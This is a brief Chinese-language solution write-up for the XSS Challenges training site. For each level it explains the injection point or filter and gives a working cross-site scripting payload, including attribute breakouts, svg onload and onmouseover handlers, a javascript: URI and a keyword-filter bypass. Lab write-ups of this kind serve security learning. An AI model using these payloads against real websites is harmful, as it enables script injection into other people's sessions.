XSS Challenges solution

题目地址:http://xss-quiz.int21h.jp

challenge 1

输出在搜索结果里面，有引号包围，所以先闭合双引号，然后为所欲为就可以了
payload: "<svg onload=alert(document.domain)>

输出在搜索框里面，闭合tag和双引号
payload: "><script>alert(document.domain)</script>

input 输入框被逃逸了，但是其实还有一个输入点是那个单选下拉菜单，使用开发者工具，修改一个国家的文本为 :
payload: </b><svg onload=alert(document.domain)>

使用开发者工具看到隐藏表单进行xss payload: "><svg onload=alert(document.domain)>

输入框限制长度，直接用开发者工具把max-length设置成100
payload: " onmouseover=alert(document.domain) " 前面双引号用来闭合value，后面双引号用来闭合多出来的一个双引号

和上面的payload 一样

和上面一样。。。。

javascript 协议 payload: javascript:alert(document.domain)

漏洞是ie7 的。。。。放弃了
直接用开发者工具在源码加一个alert,跳过吧 pass

使用正则替换掉了domain为空
payload: " onmouseover=alert(document.domadomainin)

利用正则替换了script on style
所以可以用伪协议
payload: "><a href="javascript:alert(document.domain);">test</a>

后面有许多ie特性，实在不想做了，干脆看看wp学一波。。。。